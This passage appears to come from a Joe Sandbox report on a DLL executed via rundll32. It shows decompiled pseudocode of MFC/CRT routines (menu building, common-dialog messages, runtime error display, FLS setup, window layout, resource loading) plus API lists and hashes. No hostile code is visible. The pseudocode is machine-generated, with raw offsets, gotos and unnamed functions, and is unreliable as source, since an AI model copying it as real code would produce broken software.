											_t77 = _t216 + 1; // 0x1
											 *(_t224 + 8) = _t77;
											_t79 = _t203 + 1; // 0x3
											_t230 = _t230 + 0xc;
											 *(_t224 + 4) = _t79;
											_v304 =  *_t138;
											InsertMenuA( *( *(_t224 + 0xc) + 4),  *(_t224 + 8), 0x400,  *(_t224 + 4), _v304);
											E100014B0(_v316 + 0xfffffff0,  *(_t224 + 8));
											_v8 = 1;
											E100014B0(_v312 + 0xfffffff0,  *(_t224 + 8));
											_a4 = _a4 + 1;
											__eflags = _a4 -  *(_t220 + 4);
											if(_a4 <  *(_t220 + 4)) {
												_t176 = _v308;
												continue;
											}
											goto L40;
										}
									}
									L40:
									 *(_t224 + 8) =  *(_t224 + 8) - 1;
									 *((intOrPtr*)(_t224 + 0x20)) = GetMenuItemCount( *( *(_t224 + 0xc) + 4));
									 *((intOrPtr*)(_t224 + 0x18)) = 1;
									E100014B0(_v296 + 0xfffffff0, _t216);
									__eflags = _v300 + 0xfffffff0;
									_t110 = E100014B0(_v300 + 0xfffffff0, _t216);
								}
							}
						}
					} else {
						_t180 =  *_t171;
						__eflags =  *(_t180 - 0xc);
						if( *(_t180 - 0xc) != 0) {
							 *((intOrPtr*)( *_t224 + 0xc))(_t180);
						}
						_t110 =  *((intOrPtr*)( *_t224))(0);
					}
					 *[fs:0x0] = _v16;
					return E100117AE(_t110, _v20);
				} else {
					_push(_a4);
					_push( &_v268);
					if(E1002592C(__ebx, _t219, __esi) == 0) {
						goto L10;
					} else {
						_t226 = 0;
						if( *((intOrPtr*)(_t219 + 4)) - 1 > 0) {
							while(E1002535C(_t170, _t219, _t226,  *((intOrPtr*)( *((intOrPtr*)(_t219 + 8)) + _t226 * 4)),  &_v268) == 0) {
								_t226 = _t226 + 1;
								if(_t226 <  *((intOrPtr*)(_t219 + 4)) - 1) {
									continue;
								} else {
								}
								L8:
								while(_t226 > 0) {
									E100074A5(_t170,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4, _t228,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4 - 4);
									_t226 = _t226 - 1;
									__eflags = _t226;
								}
								goto L9;
							}
							goto L8;
						}
						L9:
						return E100117AE(E10006AEC( *((intOrPtr*)(_t219 + 8)),  &_v268), _v8);
					}
				}
			}

APIs

lstrlenA.KERNEL32(00000000), ref: 10024FDD
__EH_prolog.LIBCMT ref: 1002506B
DeleteMenu.USER32(?,?,00000000), ref: 100250E9
GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 10025102
lstrlenA.KERNEL32(?), ref: 1002511F
wsprintfA.USER32 ref: 1002522E

Part of subcall function 1002592C: __EH_prolog.LIBCMT ref: 10025931
Part of subcall function 1002592C: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
Part of subcall function 1002592C: lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C

lstrcpyA.KERNEL32(?,1&0 ,000000FF,?), ref: 1002521C
InsertMenuA.USER32(00000002,00000000,00000400,00000002,?), ref: 1002528E
GetMenuItemCount.USER32 ref: 100252CC

Part of subcall function 1002535C: lstrcmpiA.KERNEL32(?,00000000), ref: 10025375

Strings

%d , xrefs: 1002520A
1&0 , xrefs: 10025213
\, xrefs: 10025127
&%d , xrefs: 10025225

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Menu$H_prologlstrlen$CountCurrentDeleteDirectoryFullInsertItemNamePathlstrcmpilstrcpylstrcpynwsprintf
String ID: %d $&%d $1&0 $\
API String ID: 342826643-2399880791
Opcode ID: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
Instruction ID: 8aad9e791dd0b61d4e6d294f68b120ef5cdd25e9988c916dda0b03ab33557493
Opcode Fuzzy Hash: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
Instruction Fuzzy Hash: 31B1BD34900215DFDB10CF64DC84FAAB7B4FF09345F508699E59A8B292DB31EA84CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1001D28C Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 123
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E1001D28C(struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
				void* __ebp;
				signed int _t31;
				signed int _t33;
				void* _t40;
				int _t46;
				intOrPtr _t64;
				signed int* _t65;
				void* _t67;
				intOrPtr* _t69;

				if(_a4 != 0) {
					_push(0x100347fd);
					_t53 = 0x1004efe8;
					_t67 = E10037855(0x1004efe8);
					__eflags =  *(_t67 + 0x18);
					if( *(_t67 + 0x18) != 0) {
						_push(_a4);
						__eflags = E10022115();
						if(__eflags == 0) {
							_t53 =  *(_t67 + 0x18);
							E10022DAA( *(_t67 + 0x18), __eflags, _a4);
							 *(_t67 + 0x18) = 0;
						}
					}
					_t64 = _a8;
					__eflags = _t64 - 0x110;
					if(_t64 != 0x110) {
						__eflags = _t64 -  *0x1004f3b8; // 0x0
						if(__eflags == 0) {
							L22:
							SendMessageA(_a4, 0x111, 0xe146, 0);
							_t31 = 1;
							__eflags = 1;
							goto L23;
						}
						__eflags = _t64 - 0x111;
						if(_t64 != 0x111) {
							L10:
							__eflags = _t64 - 0xc000;
							if(_t64 >= 0xc000) {
								_push(_a4);
								_t69 = E10022115();
								_t33 = E100244DE(_t69, 0x10040f58);
								__eflags = _t33;
								if(_t33 == 0) {
									L14:
									__eflags = _t64 -  *0x1004f3ac; // 0x0
									if(__eflags != 0) {
										__eflags = _t64 -  *0x1004f3b0; // 0x0
										if(__eflags != 0) {
											__eflags = _t64 -  *0x1004f3a8; // 0x0
											if(__eflags != 0) {
												__eflags = _t64 -  *0x1004f3b4; // 0x0
												if(__eflags != 0) {
													goto L11;
												}
												_t31 =  *((intOrPtr*)( *_t69 + 0x158))();
												goto L23;
											}
											 *((intOrPtr*)( *_t69 + 0x160))(_a12, _a16 & 0x0000ffff, _a16 >> 0x10);
											goto L11;
										}
										_t19 = _t69 + 0x1c0; // 0x1c0
										_t65 = _t19;
										 *_t65 = _a16;
										_t31 =  *((intOrPtr*)( *_t69 + 0x15c))();
										 *_t65 =  *_t65 & 0x00000000;
										goto L23;
									}
									_t31 =  *((intOrPtr*)( *_t69 + 0x158))(_a16);
									goto L23;
								}
								_t40 = E1001CE89(_t69);
								__eflags =  *(_t40 + 0x36) & 0x00000008;
								if(( *(_t40 + 0x36) & 0x00000008) != 0) {
									goto L11;
								}
								goto L14;
							}
							L11:
							_t31 = 0;
							goto L23;
						}
						__eflags = _a12 - 0x40e;
						if(_a12 == 0x40e) {
							goto L22;
						}
						goto L10;
					} else {
						 *0x1004f3a8 = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
						 *0x1004f3ac = RegisterClipboardFormatA("commdlg_ShareViolation");
						 *0x1004f3b0 = RegisterClipboardFormatA("commdlg_FileNameOK");
						 *0x1004f3b4 = RegisterClipboardFormatA("commdlg_ColorOK");
						 *0x1004f3b8 = RegisterClipboardFormatA("commdlg_help");
						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
						_push(_a16);
						 *0x1004f3bc = _t46;
						_push(_a12);
						_t31 = E1001EB68(_t53, _a4, 0x110);
						L23:
						return _t31;
					}
				}
				return 0;
			}

APIs

RegisterClipboardFormatA.USER32(commdlg_LBSelChangedNotify), ref: 1001D2E7
RegisterClipboardFormatA.USER32(commdlg_ShareViolation), ref: 1001D2F3
RegisterClipboardFormatA.USER32(commdlg_FileNameOK), ref: 1001D2FF
RegisterClipboardFormatA.USER32(commdlg_ColorOK), ref: 1001D30B
RegisterClipboardFormatA.USER32(commdlg_help), ref: 1001D317
RegisterClipboardFormatA.USER32(commdlg_SetRGBColor), ref: 1001D323

Strings

commdlg_ShareViolation, xrefs: 1001D2E9
commdlg_LBSelChangedNotify, xrefs: 1001D2E2
commdlg_SetRGBColor, xrefs: 1001D319
commdlg_ColorOK, xrefs: 1001D301
commdlg_help, xrefs: 1001D30D
commdlg_FileNameOK, xrefs: 1001D2F5

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ClipboardFormatRegister
String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
API String ID: 1228543026-3888057576
Opcode ID: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
Instruction ID: 90b801e29acbd5a70dd584596d4e007027562c874008bfc0544b1ea411f40a0f
Opcode Fuzzy Hash: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
Instruction Fuzzy Hash: E7418071A00265EFDB21FF25CC889AE3BE1EB44391B12442AF905DB251DB30EA91CB95

Uniqueness

Uniqueness Score: -1.00%

Function 10016994 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 115
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 71%

			E10016994() {
				intOrPtr _t20;
				int _t21;
				long _t24;
				void* _t31;
				void* _t51;
				long _t52;
				void* _t57;
				signed int _t67;
				void** _t69;
				void* _t70;
				void* _t72;
				void* _t73;

				_t70 = _t72 - 0x8c;
				_t73 = _t72 - 0x10c;
				_t20 =  *0x1004c470; // 0x12db9c4b
				_t52 =  *(_t70 + 0x94);
				 *((intOrPtr*)(_t70 + 0x88)) = _t20;
				_t21 = 0;
				while(_t52 !=  *((intOrPtr*)(0x1004cb88 + _t21 * 8))) {
					_t21 = _t21 + 1;
					if(_t21 < 0x13) {
						continue;
					}
					break;
				}
				_t67 = _t21 << 3;
				_t6 = _t67 + 0x1004cb88; // 0x28000000
				if(_t52 ==  *_t6) {
					_t21 =  *0x1004f3d4; // 0x0
					if(_t21 == 1 || _t21 == 0 &&  *0x1004f3d8 == 1) {
						_t17 = _t67 + 0x1004cb8c; // 0x10042328
						_t69 = _t17;
						_t24 = E10011820( *_t69);
						_t21 = WriteFile(GetStdHandle(0xfffffff4),  *_t69, _t24, _t70 + 0x94, 0);
					} else {
						if(_t52 != 0xfc) {
							 *((char*)(_t70 + 0x84)) = 0;
							if(GetModuleFileNameA(0, _t70 - 0x80, 0x104) == 0) {
								E10017B90(_t70 - 0x80, "<program name unknown>");
							}
							_t63 = _t70 - 0x80;
							if(E10011820(_t70 - 0x80) + 1 > 0x3c) {
								E10019E20(E10011820(_t63) + _t70 - 0x45, "...", 3);
								_t73 = _t73 + 0x10;
							}
							_t31 = E10011820(_t63);
							_t12 = _t67 + 0x1004cb8c; // 0x10042328
							_t14 = E10011820( *_t12) + 0x1c; // 0x1c
							_pop(_t57);
							E10010B20(_t31 + _t14 + 0x00000003 & 0xfffffffc, _t57);
							_t51 = _t73;
							E10017B90(_t51, "Runtime Error!\n\nProgram: ");
							E10017BA0(_t51, _t63);
							E10017BA0(_t51, "\n\n");
							_t15 = _t67 + 0x1004cb8c; // 0x10042328
							E10017BA0(_t51,  *_t15);
							_push(0x12010);
							_push("Microsoft Visual C++ Runtime Library");
							_push(_t51);
							_t21 = E10019D1D();
						}
					}
				}
				return E100117AE(_t21,  *((intOrPtr*)(_t70 + 0x88)));
			}

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 10016A15
_strlen.LIBCMT ref: 10016A35
_strlen.LIBCMT ref: 10016A44
_strncpy.LIBCMT ref: 10016A5B
_strlen.LIBCMT ref: 10016A64
_strlen.LIBCMT ref: 10016A71
_strlen.LIBCMT ref: 10016AD7
GetStdHandle.KERNEL32(000000F4,10042328,00000000,?,00000000,00000000,00000000,00000000), ref: 10016AE2
WriteFile.KERNEL32(00000000), ref: 10016AE9

Strings

Runtime Error!Program: , xrefs: 10016A89
..., xrefs: 10016A55
Microsoft Visual C++ Runtime Library, xrefs: 10016AB7
<program name unknown>, xrefs: 10016A22

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _strlen$File$HandleModuleNameWrite_strncpy
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 190417973-4022980321
Opcode ID: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
Instruction ID: a98b9a16bc0a3033c6b9ef3d9cc886c10ccef6c9644ec2f046cd71b0d49ba214
Opcode Fuzzy Hash: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
Instruction Fuzzy Hash: 6331F4765002146BEB21EB74CCD6EAA37BDEF48250F10891AF545EB142EF34F9C98B64

Uniqueness

Uniqueness Score: -1.00%

Function 10015384 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 71
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E10015384() {
				void* __edi;
				void* __esi;
				intOrPtr _t7;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t11;
				long _t12;
				_Unknown_base(*)()* _t16;
				void* _t22;
				struct HINSTANCE__* _t26;
				void* _t30;
				struct HINSTANCE__* _t32;

				if(E100138E5() != 0) {
					_push(_t30);
					_t26 = GetModuleHandleA("kernel32.dll");
					__eflags = _t26;
					if(_t26 != 0) {
						_t30 = GetProcAddress;
						 *0x1004f5dc = GetProcAddress(_t26, "FlsAlloc");
						 *0x1004f5e0 = GetProcAddress(_t26, "FlsGetValue");
						 *0x1004f5e4 = GetProcAddress(_t26, "FlsSetValue");
						_t16 = GetProcAddress(_t26, "FlsFree");
						__eflags =  *0x1004f5e0;
						 *0x1004f5e8 = _t16;
						if( *0x1004f5e0 == 0) {
							 *0x1004f5e0 = TlsGetValue;
							 *0x1004f5e4 = TlsSetValue;
							 *0x1004f5dc = 0x10015164;
							 *0x1004f5e8 = TlsFree;
						}
					}
					_t7 =  *0x1004f5dc(E1001520E);
					__eflags = _t7 - 0xffffffff;
					 *0x1004c848 = _t7;
					if(__eflags == 0) {
						L9:
						E1001516D();
						_t9 = 0;
						__eflags = 0;
					} else {
						_push(0x8c);
						_push(1);
						_t32 = E1001382A(_t22, 1, _t30, __eflags);
						__eflags = _t32;
						if(_t32 == 0) {
							goto L9;
						} else {
							_t11 =  *0x1004f5e4( *0x1004c848, _t32);
							__eflags = _t11;
							if(_t11 == 0) {
								goto L9;
							} else {
								 *((intOrPtr*)(_t32 + 0x54)) = 0x1004cb00;
								 *((intOrPtr*)(_t32 + 0x14)) = 1;
								_t12 = GetCurrentThreadId();
								 *(_t32 + 4) =  *(_t32 + 4) | 0xffffffff;
								 *_t32 = _t12;
								_t9 = 1;
							}
						}
					}
					return _t9;
				} else {
					E1001516D();
					return 0;
				}
			}

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,10011225,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001539C
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 100153B4
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 100153C1
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 100153CE
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 100153DB
FlsAlloc.KERNEL32(Function_0001520E,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015418
FlsSetValue.KERNEL32(00000000,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015445
GetCurrentThreadId.KERNEL32 ref: 10015459

Part of subcall function 1001516D: FlsFree.KERNEL32(FFFFFFFF,100112B4,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015178

Strings

FlsGetValue, xrefs: 100153B6
kernel32.dll, xrefs: 10015397
FlsSetValue, xrefs: 100153C3
FlsFree, xrefs: 100153D0
FlsAlloc, xrefs: 100153AE

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
API String ID: 2355849793-282957996
Opcode ID: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
Instruction ID: 40006df79962a22775231557979cac449e3f6d5e877b76d204bcc213d6c27e9e
Opcode Fuzzy Hash: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
Instruction Fuzzy Hash: D821CF78901A65DFE321CF7A9D88A673FE0EB42692718412EF910CF260EB71C480CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1002D2D6 Relevance: 21.4, APIs: 14, Instructions: 397
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E1002D2D6(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v8;
				int _v12;
				int _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				int _v48;
				void* _v52;
				struct tagRECT _v68;
				struct tagRECT _v84;
				struct tagRECT _v100;
				struct HDWP__* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t188;
				signed int _t190;
				signed int _t192;
				intOrPtr* _t198;
				intOrPtr _t206;
				int _t208;
				signed int _t210;
				signed int _t211;
				signed int _t214;
				signed int _t215;
				signed int _t221;
				void* _t225;
				intOrPtr _t233;
				intOrPtr _t234;
				int _t243;
				signed int _t251;
				signed int _t256;
				long _t263;
				intOrPtr _t264;
				int _t273;
				signed int _t280;
				signed int _t287;
				intOrPtr* _t297;
				intOrPtr _t302;
				signed int _t310;
				signed int _t312;
				intOrPtr _t319;
				signed int _t325;
				intOrPtr _t326;
				signed int _t329;
				int _t334;
				intOrPtr* _t341;

				_t297 = __ecx;
				E1002F49A( &_v28, _a8, _a12);
				if(IsRectEmpty(_t297 + 0xac) != 0) {
					GetClientRect( *(E10022A96(_t297) + 0x1c),  &_v84);
					_t188 = _v84.right - _v84.left;
					_t302 = _v84.bottom - _v84.top;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *_t297 + 0x13c))( &_v68, _a12);
					_t188 = _v68.right - _v68.left;
					_t302 = _v68.bottom - _v68.top;
				}
				_t334 = 0;
				_v44 = _t188;
				_v40 = _t302;
				if( *((intOrPtr*)(_t297 + 0xa8)) == 0) {
					_v132 = BeginDeferWindowPos( *(_t297 + 0x9c));
				} else {
					_v132 = 0;
				}
				_t190 =  *0x1004efa0; // 0x2
				_v36 =  ~_t190;
				_t192 =  *0x1004efa4; // 0x2
				_v32 =  ~_t192;
				_v16 = _t334;
				_v12 = _t334;
				_v8 = _t334;
				if( *(_t297 + 0x9c) <= _t334) {
					L72:
					if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && _v132 != _t334) {
						EndDeferWindowPos(_v132);
					}
					SetRectEmpty( &_v100);
					 *((intOrPtr*)( *_t297 + 0x13c))( &_v100, _a12);
					if(_a8 == _t334 || _a12 == _t334) {
						if(_v28 != _t334) {
							_v28 = _v28 + _v100.left - _v100.right;
						}
					}
					if(_a8 == _t334 || _a12 != _t334) {
						if(_v24 != _t334) {
							_v24 = _v24 + _v100.top - _v100.bottom;
						}
					}
					_t198 = _a4;
					 *_t198 = _v28;
					 *((intOrPtr*)(_t198 + 4)) = _v24;
					return _t198;
				} else {
					do {
						_t341 = E1002CE0B(_t297, _v8);
						_v20 = _t341;
						_t206 =  *((intOrPtr*)(E100086F2(_t297 + 0x94, _v8)));
						if(_t341 == _t334) {
							if(_t206 != _t334) {
								goto L71;
							}
							L58:
							_t208 = _v16;
							if(_t208 != _t334) {
								if(_a12 == _t334) {
									_t310 = _v36 + _t208 -  *0x1004efa0;
									_v36 = _t310;
									if(_v28 <= _t310) {
										_v28 = _t310;
									}
									_t210 = _v32;
									if(_v24 <= _t210) {
										_v24 = _t210;
									}
									_t211 =  *0x1004efa4; // 0x2
									_v32 =  ~_t211;
								} else {
									_t312 = _v32 + _t208 -  *0x1004efa4;
									_t214 = _v36;
									_v32 = _t312;
									if(_v28 <= _t214) {
										_v28 = _t214;
									}
									if(_v24 <= _t312) {
										_v24 = _t312;
									}
									_t215 =  *0x1004efa0; // 0x2
									_v36 =  ~_t215;
								}
								_v16 = _t334;
							}
							goto L71;
						}
						if( *((intOrPtr*)( *_t341 + 0x150))() == 0) {
							L51:
							if(_v12 != _t334) {
								goto L71;
							}
							L52:
							 *((intOrPtr*)( *_t341 + 0x154))( &_v132);
							goto L71;
						}
						_t221 =  *(_t341 + 0x7c);
						if((_t221 & 0x00000004) == 0 || (_t221 & 0x00000001) == 0) {
							asm("sbb eax, eax");
							_t225 = ( ~(_t221 & 0x0000a000) & 0xfffffffa) + 0x10;
						} else {
							_t225 = 6;
						}
						 *((intOrPtr*)( *_t341 + 0x134))( &_v52, 0xffffffff, _t225);
						E100086B2( &_v68, _v36, _v32, _v52, _v48);
						GetWindowRect( *(_t341 + 0x1c),  &_v84);
						E10028E5A(_t297,  &_v84);
						if(_a12 == _t334) {
							_t233 = _v84.top;
							if(_t233 > _v68.top &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
								OffsetRect( &_v68, _t334, _t233 - _v68.top);
							}
							_t234 = _v68.bottom;
							_t319 = _v40;
							if(_t234 > _t319 &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
								_t325 = _t319 - _t234 - _v68.top -  *0x1004efa4;
								_t256 = _v32;
								if(_t325 > _t256) {
									_t256 = _t325;
								}
								OffsetRect( &_v68, _t334, _t256 - _v68.top);
							}
							if(_v12 == _t334) {
								if(_v68.top < _v40 -  *0x1004efa4) {
									goto L44;
								}
								_t247 = _v8;
								if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t247 - 1))) == _t334) {
									goto L44;
								} else {
									goto L56;
								}
							} else {
								_t251 =  *0x1004efa4; // 0x2
								_v12 = _t334;
								OffsetRect( &_v68, _t334,  ~(_v68.top + _t251));
								L44:
								if(EqualRect( &_v68,  &_v84) == 0) {
									if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t341 = _v20;
										_t334 = 0;
									}
									E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
								}
								_v32 = _v68.top -  *0x1004efa4 + _v48;
								_t243 = _v52;
								if(_v16 > _t243) {
									goto L52;
								} else {
									_v16 = _t243;
									goto L51;
								}
							}
						} else {
							_t263 = _v84.left;
							if(_t263 > _v68.left &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
								OffsetRect( &_v68, _t263 - _v68.left, _t334);
							}
							_t264 = _v68.right;
							_t326 = _v44;
							if(_t264 <= _t326 ||  *((intOrPtr*)(_t297 + 0x90)) != _t334) {
								L22:
								if(_v12 == _t334) {
									if(_v68.left < _v44 -  *0x1004efa0) {
										L27:
										if(EqualRect( &_v68,  &_v84) == 0) {
											if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t341 = _v20;
												_t334 = 0;
											}
											E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
										}
										_v36 = _v52 -  *0x1004efa0 + _v68.left;
										_t273 = _v48;
										if(_v16 <= _t273) {
											_v16 = _t273;
										}
										goto L52;
									}
									_t277 = _v8;
									if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t277 - 1))) == _t334) {
										goto L27;
									} else {
										L56:
										E1001E2F0(_t297, _t297 + 0x94, _t334, 1, _v8, _t334, 1);
										_v12 = 1;
										goto L58;
									}
								}
								_t280 =  *0x1004efa0; // 0x2
								_v12 = _t334;
								OffsetRect( &_v68,  ~(_t280 + _v68.left), _t334);
								goto L27;
							} else {
								_t329 = _t326 - _t264 -  *0x1004efa0 - _v68.left;
								_t287 = _v36;
								if(_t329 > _t287) {
									_t287 = _t329;
								}
								OffsetRect( &_v68, _t287 - _v68.left, _t334);
								goto L22;
							}
						}
						L71:
						_v8 = _v8 + 1;
					} while (_v8 <  *(_t297 + 0x9c));
					goto L72;
				}
			}

APIs

IsRectEmpty.USER32 ref: 1002D2FA
GetClientRect.USER32 ref: 1002D338
BeginDeferWindowPos.USER32(?), ref: 1002D365
GetWindowRect.USER32 ref: 1002D41B
OffsetRect.USER32(?,?,00000000), ref: 1002D44E
OffsetRect.USER32(?,?,00000000), ref: 1002D483
OffsetRect.USER32(?,00000002,00000000), ref: 1002D4A3
EqualRect.USER32 ref: 1002D4DD
OffsetRect.USER32(?,00000000,?), ref: 1002D559
OffsetRect.USER32(?,00000000,?), ref: 1002D58E
OffsetRect.USER32(?,00000000,?), ref: 1002D5B2
EqualRect.USER32 ref: 1002D5C0
EndDeferWindowPos.USER32(?), ref: 1002D70D
SetRectEmpty.USER32(?), ref: 1002D717

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
String ID:
API String ID: 3160784657-0
Opcode ID: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
Instruction ID: 3196aec78d80ec659258b0f525fbb29d57e8b94677c4b91abc4d73535c0add33
Opcode Fuzzy Hash: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
Instruction Fuzzy Hash: D5F1023190062ADFCF01DFA8E9889AEBBF5FF48340F54452AE809EB255D730AE45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1002B597 Relevance: 21.1, APIs: 14, Instructions: 136
windowCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E1002B597(signed int _a4, signed int _a8, struct HDC__* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t53;
				void* _t54;
				signed int _t56;
				struct HDC__* _t65;
				struct HBITMAP__* _t66;
				struct HDC__* _t70;
				void* _t78;
				int* _t80;
				int _t81;
				signed int _t84;
				signed int _t89;
				void* _t102;
				struct HDC__* _t103;
				BITMAPINFO* _t105;

				_t53 = LoadResource(_a4, _a8);
				_v20 = _t53;
				if(_t53 == 0) {
					return _t53;
				}
				_t54 = LockResource(_t53);
				_t78 = _t54;
				_v12 = _t78;
				if(_t78 == 0) {
					L17:
					return _t54;
				}
				_t99 =  *_t78 + 0x40;
